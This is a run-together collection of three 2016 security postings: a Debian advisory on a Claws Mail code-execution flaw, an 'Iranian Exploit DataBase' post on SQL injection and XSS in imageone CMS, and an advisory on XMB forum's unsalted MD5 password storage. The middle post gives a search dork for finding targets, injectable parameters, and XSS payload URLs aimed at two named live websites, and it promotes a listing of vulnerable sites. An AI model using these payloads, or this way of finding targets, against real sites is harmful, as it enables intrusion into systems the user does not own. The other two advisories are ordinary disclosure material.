- ------------------------------------------------------------
-------------Debian Security Advisory DSA-3452-1 security@debian.orghttps://www.debian.org/security/ Ben HutchingsJanuary 23, 2016 https://www.debian.org/security/faq- -------------------------------------------------------------------------Package : claws-mailCVE ID : CVE-2015-8614"DrWhax" of the Tails project reported that Claws Mail is missingrange checks in some text conversion functions. A remote attackercould exploit this to run arbitrary code under the account of a userthat receives a message from them using Claws Mail.For the oldstable distribution (wheezy), this problem has been fixedin version 3.8.1-2+deb7u1.For the stable distribution (jessie), this problem has been fixed inversion 3.11.1-3+deb8u1.We recommend that you upgrade your claws-mail packages.Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/
Sql and Xss vulnerability in imageone Cms All Version################################### @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@###############################
####### Iranian Exploit DataBaseTiTle : imageone Cms Multiple vulnerabilitiesRisk : HighTested on : LinuxVendor site : http://www.image1tech.net/Dork : intext:"imageone development"Version : All Version Of CmsAuthor : AmirHome : http://iedb.ir - http://xssed.irArchive Exploit : http://iedb.ir/exploits.php?id=4582#####################################Bug :http://target/index.php?pageid=[sql][xss]http://target/inventory.php?classid=[sql][xss]#####################################Dem0 :http://www.oerv.com/index.php?pageid=5[xss][sql]'"><script>alert('iedb.ir')</script>http://www.outdoorexpressrv.com/index.php?pageid=6[xss][sql]'"><script>alert('iedb.ir')</script>http://www.oerv.com/inventory.php?classid=16[xss][sql]'"><script>alert('iedb.ir')</script>http://www.outdoorexpressrv.com/inventory.php?classid=16'"><script>alert('iedb.ir')</script>#####################################Thanks to all the friends and Iranian hackers, and thank all the members http://Iedb.Ir And IrIsT.Ir TeamHome : http://iedb.ir - http://xssed.ir - http://iedb.ir/acchttp://Xssed.Ir : On this site, all bugs Xss and Sql which sites are placed.Be sure to check the site and sites vulnerable to it.#####################################Archive Exploit : http://iedb.ir/exploits.php?id=4582#####################################
[+] Credits: hyp3rlinx[+] Website: hyp3rlinx.altervista.org[+] Source: http://hyp3rlinx.altervista.org/advisories/XMB-WEAK-CRYPTO.txtVendor:==============xmbforum2.comProduct:======================================XMB - eXtreme Message Board v1.9.11.13XMB forum software is open source and runs PHP scripts with a MySQL database backend.Vulnerability Type:==============================
=========Weak Crypto / Insecure Password StorageVulnerability Details:=====================1) Weak CryptoXMB Forum uses weak MD5 hashing algorithm and no salt, the unsalted passwords are then stored in a browser cookie and also in the 'xmb_members'table of the XMB database. Using weak cryptographic one-way hash functions like MD5 without using salt for storing user passwords allows attackersthat gain access to this data ability to conduct password cracking attacks using pre-computed dictionaries, e.g. rainbow tables.2) Insecure StorageStoring user passwords in unsalted MD5 hash form leaves them vulnerable both online and offline. I noticed XMB has no session timeout/logout mechanismfor if a user is inactive for a certain period of time and does not logout, leaving thier MD5 unsalted passwords stored in cookies on disc. This furtherallows thier passwords to be vulnerable to theft if their local machine is compromised. However, even if the user logs out and XMB cookies are clearedthe passwords are still in the MySQL database on the server unsalted and MD5 hashed.POC:=====Example XMB cookie ...MD5 password of 'abc123' ----> 'e99a18c428cb38d5f260853678922e03'"xmblva=1453182891; xmblvb=1453178920; xmbuser=admin; xmbpw=e99a18c428cb38d5f260853678922e03; xmblva=1453091894;On disc ---> %APPDATA%\Roaming\Mozilla\Firefox\Profiles in the 'cookies.sqlite' database file used by Firefox.e.g.localhostxmbpwe99a18c428cb38d5f260853678922e03localhost/XMB-1.9.11.13/filesIn "member.php" on line 493 under files/ dir of XMB application we see hashing of user password using weak MD5 hashing function, then being storedin the MySQL database.$password = md5($password);if ($SETTINGS['regoptional'] == 'off') {$db->query("INSERT INTO ".X_PREFIX."members (username, password, regdate, postnum, email, ....etc....In 'member.php' line 599 we see it stored in cookie ---> put_cookie("xmbpw", $password, $currtime, $cookiepath, $cookiedomain);Disclosure Date:====================================Vendor Notification: NAJanuary 23, 2016 : Public Disclosure[+] DisclaimerPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.by hyp3rlinx
